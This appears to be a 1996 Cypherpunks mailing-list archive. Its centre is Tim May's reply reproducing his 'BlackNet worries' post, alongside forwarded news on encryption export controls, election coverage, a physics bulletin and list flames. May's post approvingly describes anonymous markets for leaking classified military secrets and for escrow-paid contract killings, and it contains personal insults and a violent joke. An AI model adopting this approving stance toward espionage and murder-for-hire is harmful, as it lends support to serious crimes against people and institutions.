Subject: Re: "high noon on the electronic frontier"
In-Reply-To: <199611060312.TAA06372@netcom7.netcom.com>
Message-ID: <v03007801aea6ba031728@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I try to avoid responding to Detweiler's points, even the good ones he
often makes (because he was so flamish and insulting in '93-'94 and because
he forged my name on anti-semitic rants posted to soc.culture.jewish and
soc.culture.german, amongst other such serious behaviors on his part).

However, he has asked a direct question (though he does his characteristic
speculation on the "real" facts and adds his "hee hee" noise), so I will
answer.

At 7:12 PM -0800 11/5/96, Vladimir Z. Nuri wrote:

>TCMay is well represented with several essays in a section on
>"encryption, privacy, and crypto-anarchism". 3 essays,
>Crypto Anarchist Manifesto, Intro to Blacknet, and
>BlackNet worries.
>
>I was curious about TCMay's essay on Blacknet, though, that
>mentions a mysterious "X" who he credits as raising many
>of the issues surrounding Blacknet on the cpunk mailing list
>in Feb 1994. Ludlow states in a footnote TCMay "elided
>references to interlocutors". I wonder about the identity
>of the mysterious "X" and whether he/she is still posting
>to the list. does anyone know who he/she is?

Yes, someone does.

An easy way to find out what was elided is to consult the archives, such as
they are, or consult one's personal store of saved messages from that
period, and read the original. (Lest anyone not be able to do this, I have
included the original message at the end of this message. There were also a
bunch of related posts from folks such as Hal Finney, Sandy Sandfort, Pat
Farrell, Stanton McCandlish, Duncan Frissell, etc.)

When Ludlow sent me what items of mine he proposed to include in his book,
there were two standalone essays (the 1988 Manifesto and the 1993
Introduction to BlackNet) and an item of Cypherpunks list traffic that
included quoted material and comments from others. For example, Hal Finney.

I told Ludlow that I could grant republication rights for _my_ stuff, but
certainly not for others. And I pointed out that the e-mail item lacked
some context, contained some asides which were not germane to the larger
points, and that I would prefer to rework the e-mail item if he wanted to
include it. (With the statement that the piece had been edited...when I
glanced at the Ludlow book in a bookstore (I haven't justified to myself
paying $30 for a damned paperback!!!), I think I noticed that he included
my e-mail to him as the intro to the piece!

I suppose I could have contacted those who had influenced the piece and
arrange for formal releases of rights, or ask that Ludlow do so, but I
really wanted to rework the piece, as I noted. For example, I modified some
of the examples I used, as what is appropriate to discuss in a published
book is always a bit different from what is OK to use in e-mail, even to a
mailing list.


>I was thinking it would be interesting to see whether
>he/she still feels the same about Blacknet and/or get a new
>conversation going about the subject with the insight that
>time can bring.

Well, these discussions have come up many times. Recently, Doug Barnes has
had comments on the BlackNet issue. Hal's comments are available.


>I wonder why TCMay found it important to elide "X"'s identity--
>perhaps "X" was one of his tentacles? (hee, hee)

Back on your lithium, Vlad. Or are you using Pablo now? Or Medusa? Or just
Lance?

Here is the article excerpted and edited in the Ludlow book:

From: tcmay (Timothy C. May)
Subject: Re: Blacknet worries
To: cypherpunks@toad.com
Date: Sun, 20 Feb 1994 12:33:12 -0800 (PST)
Cc: tcmay (Timothy C. May)
MIME-Version: 1.0
Status: RO

Hal Finney makes some comments about the dangers (I call them
benefits) of systems like "BlackNet," the hypothetical-but-inevitable
entity I described last fall. These dangers/benefits have been
apparent to me since around 1988 or so and are the main motivator of
my interest in "crypto-anarchy," the set of ideas that I espouse.

(I don't often dwell on them on this list, partly because I already
have in the past, and in the "Crypto-Anarchist Manifesto" and other
rants at the soda.berkeley.edu archive site, and partly because the
Cypherpunks list is somewhat apolitical...apolitical in the sense that
we have libertarians, anarcho-syndicalists, anarcho-capitalists,
Neo-Pagans, Christian Fundamentalists, and maybe even a few
unreconstructed Communists on the List, and espousing some particular
set of beliefs is discouraged by common agreement.)

However, since Hal has raised some issues, and the general issues of
data havens, anonymous information markets, espionage, and other
"illegal" markets have been raised, I'll comment. Besides, volume on
the List has been awfully light the past few days. Maybe it's my mail
delivery system slowing down, maybe it's the Olymics (I say put Tonya
up on the gold medalist's platform, put the gold medal around her neck,
then the noose, then kick the platform out from under her), or maybe
it's the natural exhaustion of the last set of hot topics.

First, a legal caveat. I openly acknowledge having written the
BlackNet piece--proof is obvious. But I did *not* post it to
Cypherpunks, nor to any other mailing lists and certainly not to
Usenet. Rather, I dashed it off one night prior to a nanotechnology
discussion in Palo Alto, as a concrete example of the coming future
and how difficult it will be to "bottle up" new technologies (a point
Hal alludes to). I sent this note off to several of my associates, via
anonymous remailers, so as to make the point in a more tangible way. I
also printed out copies and passed them out at the nanotech meeting,
which was around last September or so.

Someone decided to post this (through a remailer) to the Cypherpunks
list. Kevin Kelly and John Markoff told me they've seen it on numerous
other lists and boards, and of course Detweiler has recently posted it
to dozens of newsgroups (though it got cancelled and only the "echoes"
remain in most places...a few folks forwarded copies to ohter sites,
with comments, so they were not affected by the cancellation message).

My legal protection, my point here, is that I did not post the
BlackNet piece, it does not exist as an actual espionage or data haven
entity, and my point was rhetorical and is clearly protected by the
First Amendment (to the Constitution of the country in which I
nominally reside).

On to Hal Finney's points:
>
> Tim's Blacknet story has gotten a lot of reaction after Detweiler's
> random posting escapade last week.  I think it is a good essay, but there
> is one point I don't think was stressed enough.
>
> > BlackNet is currently building its information inventory. We are interested
> > in information in the following areas, though any other juicy stuff is
> > always welcome. "If you think it's valuable, offer it to us first."
> >
> > - trade secrets, processes, production methods (esp. in semiconductors)
> > - nanotechnology and related techniques (esp. the Merkle sleeve bearing)
...
> The glaring omision, mentioned only in passing, is military intelligence.

Yes, military intelligence will become much more "fungible" in the
future I envision. It already is, of course, a la the Walkers, but
computer-mediated markets and secure encryption will make it so much
more efficient and liquid. Buyers will be able to advertise their
wants and their prices. Ditto for sellers. Of course, decoys,
disinformation, and the like come to the fore.

To pick a trivial example, someone sits above a busy port and watches
ship movements from the privacy of his apartment. He summarizes these,
then sells them for a paltry-but-comfortable $3000 a month to some
other nation. (The ease of doing this means others will get into the
market. Prices will likely drop. Hard to predict the final
prices...the beauty of free markets.)

> A friend at work tells me that in the Manhattan project, presumably one
> of the most secret projects ever attempted, the Soviet Union had no

Yes, Hal's point is valid. William Gibson, so reviled in some
cyberpunk quarters (it's tres chic to bash him) anticipated this some
years back in "Count Zero," in which the scientists of a company are
held isolated on a mesa in New Mexico--recall the rescue/escape by
ultralight aircraft off the mesa?

The motivation for thinking about BlackNet, which is what I dubbed
this capability in late 1987, was a discussion with the late Phil
Salin that year about his as-yet-unfunded company, "AMIX," the
American Information Exchange. I played the Devil's Advocate and
explained why I thought corporate America--his main target for
customers--would shun such a system. My thinking?

- corporations would not allow employees to have corporate accounts,
as it would make leakage of corporate information too easy

(Example: "We will pay $100,000 for anyone who knows how to solve the
charge buildup problem during ion implant of n-type wafers." Many
corporations spend millions to solve this, others never did. A
"market" for such simple-to-answer items would revolutionize the
semiconductor industry--but would also destroy the competitive
advantage obtained by those who first solved the problems. Another
example, from earlier on, is the alpha particle problem plaguing
memory chips. I figured out the problem and the solution in 1977, at
Intel, and then Intel kept it a deep secret for the next year,
allowing its competitors to wallow in their soft error problems for
that entire year. When I was eventually allowed to publish--a decision
made for various reasons--the competitors raced for the telephones
even before I'd finished presenting my paper! Imagine how much I
could've sold my "expertise" for in the preceding year--or even after.
Of course, Intel could have deduced who was selling what, by various
intelligence-copunterintelligence ploys familiar to most of you
(canary traps, barium, tagged info). But the point is still clear: an
information market system like AMIX means "digital moonlighting," a
system corporations will not lightly put up with.

If information markets spread, even "legit" ones like AMIX (not
featuring anonymity), I expect many corporations to make
non-participation in such markets a basis for continuing employment.
(The details of this, the legal issues, I'll leave for later
discussions.)

> Keeping business secrets and manufacturing techniques secret is one thing.
> But, from the point of view of the government, the world of Blacknet could
> be an utter disaster for the protection of military secrets.  Despite its
> consumption of a large fraction of our society's resources, government jobs
> tend not to be high paying, especially compared to jobs with comparable
> degrees of responsibility in civilian life.  The temptation to sell secrets
> for cash has got to be present for almost everyone.  But it is balanced
>against
> the immense practical problems involved: making contacts, arranging
> deliveries, being caught in a "sting" operation.

Yes, which is why I always used to use "B-2 Stealth Bomber blueprints
for sale" as my canonical example of a BlackNet ad. Hundreds of folks
at Northrup had access to various levels of B-2 secrets. The "problem"
for them was that military intelligence (Defense Intelligence Agency,
Office of Naval Intelligence, CIA, NDA, etc.) was watching them (and
they knew this) and monitoring the local bars and after-work hangouts.
Read "The Falcon and the Snowman," or rent the movie, for some details
on this.

Anonymous markets completely change the equation!

(By the way, many other "tradecraft" aspects of espionage are
similarly changed forever....and probably already have been changed.
Gone will be the messages left in Coke cans by the side of the road,
the so-called "dead drops" so favored by spies for communicating
microfilm, microdots, and coded messages. What I call "digital dead
drops" already allow nearly untraceable, unrestricted communication.
After all, if I can use a remailer to reach St. Petersburg.... Or if I
can place message bits in the LSB of a image and then place this on
Usenet for world-wide distribution..... (I described this in my first
message on using LSBs of audio and picture files in 1988, in
sci.crypt). The world has already changed for the spy. And Mafia guys
on the run are using CompuServe to communicate with their wives...the
Feds can't tap these ever-changing systems....a likely motivation for
current Clipper/Capstone/Tessera/Digital Telephony schemes.)

> Blacknet could remove most of this risk.  With near-perfect anonymity
> and digital cash, a tidy side income could be created for anyone with access
> to classified information.  There would be no need for risky physical
>meetings.
> The money could be spent on a few nice extras to make life more comfortable,
> without fear of it being traced.

Yep! That's the beauty of it all. "Classified classifieds," so to
speak. "No More Secrets." At least, no more secrets that you don't
keep yourself! (A subtle point: crypto-anarchy doesn't mean a "no
secrets" society; it means a society in which individuals must protect
their own secrets and not count on governments or corporations to do
it for them. It also means "public secrets," like troop movements and
Stealth production plans, or the tricks of implaniting wafers, will
not remain secret for long.)

> How many people would succumb to such temptation?  People do undergo security
> checks, and presumably those who pass are mostly honest.  But they are human,
> and money is a powerful motivator.  Especially if the person figures that if
> he doesn't sell the info someone else will, the temptation will be all the
> stronger.

Yes. All of this is true.

> There are possible countermeasures: frequent lie-detector tests (as in Snow
> Crash); "fingerprinting" documents so everybody has a slightly different
> copy, allowing sting operations to identify the culprits; perhaps even
> swamping the legitimate offers of cash with bogus ones (a denial-of-service
> attack, in effect).  But none of these are really likely to solve the
> problem.

We went around several times on the Extropians list (which I am no
longer on, by the way--for unrelated reasons), especially with regard
to what most folks consider an even more disturbing use of
BlackNet-type services: liquid markets for killings and extortion. Pun
intended. Buyers and sellers of "hits" can get in contact anonymously,
place money (digicash) in escrow with "reputable escrow services"
("Ace's Anonymous Escrow--You slay 'em, we pay 'em"), and the usual
methods of stopping such hits fail.

(The Mob rarely is stopped, as they use their own hitters, usually
brought if from distant cities for just the one job. And reputations
are paramount. Amateurs usually are caught because they get in contact
with potential hitters by "asking around" in bars and the
like...and somebody calls the cops and the FBI then stings 'em.
Anonymous markets, digital cash, escrow services, and reputation
services all change the equation dramatically. If the hit is made, the
money get transferred. If the hit is not made, no money is
transferred. In any case, the purchaser of the hit is fairly safe.
Implication of the purchaser can still happen, but by means other than
the usual approach of setting up a sting.)

> This is probably the issue which has the government really scared, the
> issue which turned Barlow's government friends against free encryption, as
> he describes in his Wired article ("if you knew what I know, you'd oppose
> it too").  The NSA in particular has for a long time been wildly paranoid

Yes, if I could think all this stuff up in 1987-8, so can a lot of
others. It was clear to me, at the Crypo Conference in 1988, that
David Chaum had thought of these uses and was deliberately navigating
around them in his scenarios for digicash. He just raised his eyebrows
and nodded when I discussed a few of the less fearsome applications.

...
> its own secrets than discovering others'.  I could see any technology which
> would facilitate sellouts by their people to be considered a mortal threat,
> something to be fought by any means.  And I imagine that the rest of the
> military intelligence community would feel the same way.

To the governments of the world, facing these and other threats to
their continued ways of doing business (notice that I didn't say "to
their continued existence"), the existence of strong encryption in the
hands of the population is indeed a mortal threat.

They'll cite the "unpopular" uses: kiddie porn nets, espionage,
selling of trade secrets (especially to "foreigners"), the bootlegging
of copyrighted material, "digital fences" for stolen information,
liquid markets in liquidations, and on and on. They won't mention a
basic principle of western civilization: that just because _some_
people mis-use a technology that is no reason to bar others.

Just because some people mis-use camcorders to film naked children is
no reason to ban cameras, camcorders, and VCRs. Just because some
folks mis-use free speech is no reason to ban free speech. And just
because some will mis-use encryption--in the eyes of government--is
not a good reason to ban encryption.

In any case, it's too late. The genie's nearly completely out of the
bottle. National borders are just speed bumps on the information
highway.

The things I've had in my .sig for the past couple of years are coming.


--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 6 Nov 1996 11:33:41 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: IRS Subscribed to Cypherpunks
In-Reply-To: <3.0b36.32.19961105070826.0070f470@panix.com>
Message-ID: <Pine.SUN.3.91.961106143511.29472C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Nov 1996, Duncan Frissell wrote:

I've been getting a few of these too, to replies I've posted to 
cypherpunks@toad.com.  Interestingly enough, one came up from my filtered 
list. :(

> Got the following bounce.  The Cc: was to a real address.
> 
> DCF
> 
> >Date: Tue, 5 Nov 1996 05:24:21 -0500
> >From: Administrator@ccmail.irs.gov (Administrator)
> >Subject: Message not deliverable
> >To: Duncan Frissell <frissell@panix.com>
> >Cc: XXXXXXXXX (Administrator)
> >Content-Description: cc:Mail note part
> >
> >At 04:45 AM 11/4/96 -0800, Declan McCullagh wrote:
> >>Libertarianism is not incompatible with strict regulations, as long as 
> >>the rules violate nobody's rights.
> >>
> >>-Declan
> >
> >Obviously many voluntary religious organizations have quite strict rules
> >for their members and are compatible with libertarianism.  Government
> >monopoly regulations that cannot be opted out of are not compatible with
> >libertarianism.  Instead of using the loaded term "regulations' it might be
> >better to call things like the rules of the cypherpunk's list "club rules"
> >or protocols.
> >
> >DCF
> >
> >
> 

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 6 Nov 1996 11:34:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sony/Philips has trouble exporting Web TV's (fwd)
Message-ID: <Pine.SUN.3.91.961106143609.29472D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sat, 2 Nov 1996 15:59:04 -0500 (EST)
From: v0!d <voidmstr@primenet.com>
To: Multiple recipients of list <wwwac@echonyc.com>
Subject: Sony/Philips has trouble exporting Web TV's (fwd)


>>
>>     From Electronic Buyers' News:
>>
>>     October 28, 1996
>>     Issue: 1030
>>     Section: News
>>
>>     CODE LIMIT EXCEEDED
>>
>>     By Jack Robertson
>>
>>     Washington - New Internet-television systems from Sony Corp. and
>>     Philips Electronics Co. are technically munitions under U.S. export
>>     controls and cannot be shipped to the companies' worldwide sales
>>     networks, it was disclosed last week.
>>
>>     Sony officials said the company's TV set-top box designed by WebTV of
>>     Palo Alto, Calif., includes a state-of-the-art 128-bit code encryption
>>     system for electronic commerce. This far exceeds the 40-bit encryption
>>     code permissible for export under the U.S. Munitions Control List.
>>
>>     Philips also makes a WebTV set-top Internet box at its Magnavox TV
>>     plant in Knoxville, Tenn., and is similarly barred from shipping the
>>     unit to sales channels around the world.
>>
>>     Both global electronic giants face immediate competition in the
>>     emerging TV-Internet surfing market from other Japanese, South Korean,
>>     and European set-makers that don't face the U.S. encryption
>>     controls. They now join the U.S. computer industry, which has long
>>     protested that the outmoded encryption export curbs are causing them
>>     to forfeit overseas sales of PCs and workstations to foreign rivals.
>>
>>     President Clinton last month proposed lifting the level of encryption
>>     export controls from the present 40-bit code word to 56 bits, but only
>>     if a trap door is embedded in the cipher to allow law enforcement
>>     agencies to decode wiretapped messages. Clinton is expected shortly to
>>     sign an executive order putting the new control limits into effect.
>>
>>     The pending 56-bit-code threshold doesn't help the Sony or Philips
>>     Web-surfing TV systems - nor most U.S. computer companies that build
>>     systems with encryption exceeding even the new control limit. Both
>>     Netscape and Microsoft Web-browsing software includes 128-bit code
>>     encryption, surpassing export curbs.
>>
>>     Zenith Electronics Co., maker of a Web-surfing TV set, isn't concerned
>>     about the encryption controls, since it sells only in the U.S. market
>>     where the curbs don't apply.
>>
>>     Divicom Inc., based in Milpitas, Calif., must get an export license
>>     from the U.S. State Department for every exported cable TV front-end
>>     encoder, which includes 128-bit code word, according to Tom
>>     Lookabough, the company's sales manager. He said the license review
>>     process can take eight weeks or more, a troublesome delay that foreign
>>     competitors don't face.
>>
>>     Divicom and Scientific Atlanta both said their new digital TV set-top
>>     boxes include encryption that exceeds allowable export limits - but
>>     virtually all sales so far are in the U.S. market. As digital-box
>>     production ramps up, the companies would like to sell overseas, but
>>     run into the export control ban that puts them at a severe
>>     disadvantage against the foreign competitors aggressively entering the
>>     set-top market.
>>
>>     President Clinton's encryption export control changes include an
>>     industry-favored provision to take the category off the State
>>     Department's Munitions Control List and shift responsibility to the
>>     Commerce Department.
>>



Dennis Wilen : WWW Design, Production and Consulting
voidmstr's law: bandwidth expands to fit the waste available
voidmstr@primenet.com   http://www.primenet.com/~voidmstr
2385 Roscomare Road, Bel Air CA 90077  voice: 310-471-7849










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 6 Nov 1996 12:19:52 -0800 (PST)
To: John Young <cypherpunks@toad.com
Subject: Re: CLA_sh0
Message-ID: <3.0b19.32.19961106152204.007350f0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 11/6/96 -0500, John Young wrote:
>      Unless the West recognizes the power of cultural
>      conflict, it could perish from ignorance, overconfidence
>      and complacency.

Unless Islam and China recognize the power of Coca Cola, IPOs, blue jeans,
TCP/IP, and videos they could perish from lack of interest.

DCF 

"How you gonna keep 'em down on the farm after they've seen Broadway"?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "networks@vir.com" <networks@vir.com>
Date: Wed, 6 Nov 1996 12:24:21 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Re: [NOISE] If the shoe fits, wear it [VULIS]
Message-ID: <01BBCBF6.6CBDEC00@ipdyne9.vir.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves Wrote:

>Yes, this gets to my point. Private censorship tells more about the 
>censor than about the censored. In this case, John acted properly, and 
>his credibility has only been enhanced. You are of course free to rant 
>and rave about his hypocrisy, but expecially since you'll always be able 
>to post to the list, at least under a nym (the only thing he's prevented 
>is your reading the list under your own name), you're only proving 
>yourself to be an idiot.

The nature of the Internet means it is extremely difficult for John
to prevent Dr. Vulis from either posting using a pseudonym or
having messages forwarded to him.  IF it were possible to prevent
Vulis from either reading messages or posting do you think John
would have done that too?  Just curious.

Alan Majer
networks@vir.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 6 Nov 1996 15:31:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Net Results: elections and the Internet, from The Netly News
Message-ID: <Pine.GSO.3.95.961106152941.6640D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 6 Nov 1996 15:28:57 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Net Results: elections and the Internet, from The Netly News

[I recommend that you visit The Netly News to read the article with the
links -- I wrote it with a web audience in mind. --Declan]

---

The Netly News
November 6, 1996
http://netlynews.com/

Net Results
By Declan McCullagh (declan@well.com)
   
        Nineteen ninety-six was to have been the Year of the Netizen.
   Bob Dole this spring endorsed strong crypto, making it a likely
   campaign issue. The Communications Decency Act was accelerating
   toward the Supreme Court. Every political candidate sported a web
   page. The First Cat and the Dole Dog were online. Electronic mailing
   lists such as Netizens-l were springing up as symbols of netizens'
   hope to start wielding power over the body politic.
   
        It didn't happen. Yesterday's election largely preserves the
   status quo: a Clinton White House and a Republican Congress. Matters
   important to netizens never became campaign issues. Sure, Bill
   Clinton may have pledged to wire all schools to the Net, but election
   year rhetoric is cheap and realizing his plan will be expensive.
   Dole's stammering announcement of his web site's address demonstrated
   only his lack of a cyber-clue.
   
        Yet with the election, the political terrain has shifted subtly.
   Sen. Jim Exon (D-Neb.), architect of the CDA, has retired. The
   leadership of the powerful Senate Commerce, Science, and
   Transportation Committee will change. Attorney General Janet Reno,
   who has attacked the Net repeatedly, may step down or be replaced.
   Even with a slimmer majority, Republicans in the House likely will
   continue to resist hasty "anti-terrorist" measures and remain unlikely
   champions of online liberties. Some civil libertarians hope that
   Clinton will emerge as a statesman who for the first time does not fear
   defeat at the hands of voters. 

   CYBER-RIGHTS DARLING RICK WHITE WINS REELECTION: Fighting against
   Internet regulation may keep the campaign checks from Bill Gates
   coming, but Washington State voters would rather talk about the
   environment. Still, cyber-rights champion and Newt Gingrich fan Rep.
   Rick White (R-Washington) narrowly won his first re-election bid
   yesterday. It's bad news for the environment and good news for
   netizens. As a sophomore rep, White will be in a better position to
   shepherd pro-cyberspace legislation through the House next year.

   LEADERSHIP OF SENATE COMMERCE COMMITTEE CHANGES: Larry Pressler
   (R-South Dakota) ended an 18-year Senate career yesterday when he lost
   to challenger Tim Johnson, a House Democrat. Now the chairmanship of
   the powerful Senate Commerce, Science, and Transportation Committee --
   which handles telecommunications and Internet bills -- is in flux,
   with Arizona's John McCain the likely successor. "McCain is an unknown
   quantity. He voted for the CDA and supported crypto without being out
   in front on it," says Jonah Seiger from the Center for Democracy and
   Technology.
   
   SENATOR JOHN KERRY, TECHNO-FRIENDLY WOLF IN SHEEP'S CLOTHING:
   Although we may not agree with all of Massachusetts incumbent Sen.
   Kerry's positions on Net freedom, he at least recognizes Netizens as
   an important constituency. His vote in favor of the CDA seemed a
   strike against Netizens until he vociferously modified it to say that
   such matters should be handled by parents rather than the law. Kerry
   was the only Senator to answer the Voters Telecommunications Watch
   Pledge, a political platform for the technological public, and now
   that he's been reelected we should remind him of just what that pledge
   means. As a senator representing high-tech firms and sitting on the
   Commerce and Intelligence committees, Kerry is well-positioned to back
   up his email with his votes.
   
   ONLINE COPYRIGHT BILL LOSES CHAMPIONS: Free speech on the Net may
   get a reprieve in the next Congress, thanks to the retirement of Reps.
   Carlos Moorhead (R-California) and Patricia Schroeder (D-Colorado).
   The duo championed the heinous NII Copyright Protection Act of 1995,
   which would hold Internet providers financially liable for the actions
   of their users and make browsing the Net without a license from
   copyright holders against the law. With librarians, PTA groups, and
   teachers arguing against it, the legislation died in committee this
   summer.
   
   IN THE WHITE HOUSE AND FCC NEXT YEAR: Brace yourself for more steamy
   Net-rhetoric from Al Gore, who will take a more prominent role as
   administration spokesperson on technology and telecom issues as he
   prepares for a presidential bid in 2000. Inside the White House,
   failed health care czar Ira Magaziner has turned his attention towards
   online commerce. Sensing a possible growth opportunity, the FCC has
   started to take an interest in Internet regulation -- and Clinton now
   will appoint a commissioner to fill a vacancy at the FCC. With
   Naderites like Jamie Love calling for FCC regulation of spam,
   bureaucratic meddling seems near-inevitable.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Nov 1996 13:51:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Censorship and intellectual dishonesty
In-Reply-To: <9611051854.AA09590@etna.ai.mit.edu>
Message-ID: <NkoZwD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@ai.mit.edu writes:
> If we return to the original basis on which Mill opposed censorship
> its not hard to find out why Dimitri is denied his support. The
> argument is based on the need to keep alive debate. Dimitri wants
> to prevent debate, he does not wish to meet with the argument,
> he merely wishes to indulge in character assasinations and insults.

This isn't true, Phil.  Whatever gave you this impression?
Are you confusing me with Timmy May (fart) by any chance?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Wed, 6 Nov 1996 14:34:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Inquest?
Message-ID: <199611062232.RAA16407@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Yeah, I got it too as <2.2.32.19961104184908.00715ebc@popmail.mcs.net>. 
If I answer it, I'll Cc the list, but I figure he can read what I write 
here as easily as anyone.

Anyone who'd send this same text to both me and John Young hasn't been 
lurking very closely.

- -rich

John Young wrote:
> 
> Return-Path: lzkoch@mcs.net
> X-Sender: lzkoch@popmail.mcs.net
> Date: Mon, 04 Nov 1996 12:28:29 -0600
> To: jya@pipeline.com
> From: Lewis Koch <lzkoch@mcs.net>
> Subject: Regarding a story for Upside Magazine
> 
> John Young:
> 
> This is an identical letter to a limited number of contributors to
> Cypherpunks regarding an article I will be writing for Upside Magazine
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMoER5yoZzwIn1bdtAQHXwwGA4FjBcDK1RSWC727Wk/nJM+ztn2/DEwbp
3gRhlPtUTfZ8oXMORvwjL4NEikb+iYfn
=KmTb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 6 Nov 1996 15:33:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: update.294 (fwd)
Message-ID: <199611062335.RAA09933@einstein>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From physnews@aip.org Wed Nov  6 15:22:21 1996
Date: Wed, 6 Nov 96 10:14:13 EST
From: physnews@aip.org (AIP listserver)
Message-Id: <9611061514.AA06755@aip.org>
To: physnews-mailing@aip.org
Subject: update.294


PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 294  November 6, 1996    by Phillip F. Schewe and Ben
Stein

NANOSCALE ABACUS.  Scientists at IBM Zurich have used a
scanning tunneling microscope (STM) probe to reposition C-60
molecules on a copper substrate, making in effect the first room-
temperature device capable of storing and manipulating numbers
at the single molecule level.  The buckyballs (which are big,
sturdy molecules) act as the counters of a tiny abacus in which
low (indeed mono-atomic) terraces in the copper surface
constrain the buckyballs to move accurately in a straight line.
(The abacus is perhaps the first human calculating device, and the
Greek word means "sand on a board.")  IBM researcher James
Gimzewski (gim@zurich.ibm.com) admits that his device is
slow: "The tool we use (the STM probe) is the equivalent of
operating a normal abacus with the Eiffel Tower."  But things
should improve in coming years; with this new advance,
hundreds of buckyball ranks could fit neatly inside the same
linewidth that characterizes features on a Pentium processor chip. 
As for speed, engineers expect to fabricate arrays of hundreds
and even thousands of STM probes for simultaneously imaging
(and repositioning) many atoms and molecules.  (M.T. Cuberes
et al., to appear in the 11 November issue of Applied Physics
Letters; an associated figure can be obtained on the Web at
http://www.aip.org/physnews/graphics)

THE SHORTEST X-RAY PULSES yet produced have been
made at LBL by shooting 100-femtosecond bursts of infrared
laser light at right angles into a beam of electrons.  Some of the
photons are converted into x rays by scattering (through 90
degrees) into the same direction as the electrons.  The resultant
x-ray bursts are themselves short---about 300 fsec---and potent,
with an energy of 30 keV (or, equivalently, a wavelength of 0.4
angstroms).  By narrowing the electron beam further (currently it
is a mere 90 microns wide), even sharper x-ray pulses (50 fsec)
are in the offing.  Theses pulses are ideal probes---their small
wavelength permits studies of atomic structure with high
resolution.  Meanwhile their short duration make them an
excellent strobe light for glimpsing ultrafast phenomena. For
example, the LBL researchers are using the x-ray pulses to study
the melting of silicon.  (R.W. Schoenlein et al., Science, 11
October 1996.)

PHOTONIC CRYSTALS NOW OPERATE IN THE NEAR
INFRARED.  These structures are to optics what semiconductors
are to electronics: they allow the passage of light at some
wavelengths but exclude light in certain other energy ranges (also
called photon bandgaps).  Since the first photonic crystals
(operating at microwave wavelengths) were developed several
years ago, researchers have attempted to move toward the visible,
where potential technological applications beckon.  Scientists at
the University of Glasgow and the University of Durham have
now constructed a tiny wafer riddled with 100-micron holes
which exhibits the lowest-wavelength photonic bandgap yet: 800-
900 nm.  (Thomas F. Krauss et al., Nature, 24 October 1996.)

CORRECTION: Harold Kroto (not Croto) is the correct spelling
for the chemistry Nobelist (Update 291).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 6 Nov 1996 15:43:48 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: HAPPY GUY FAWKES DAY!
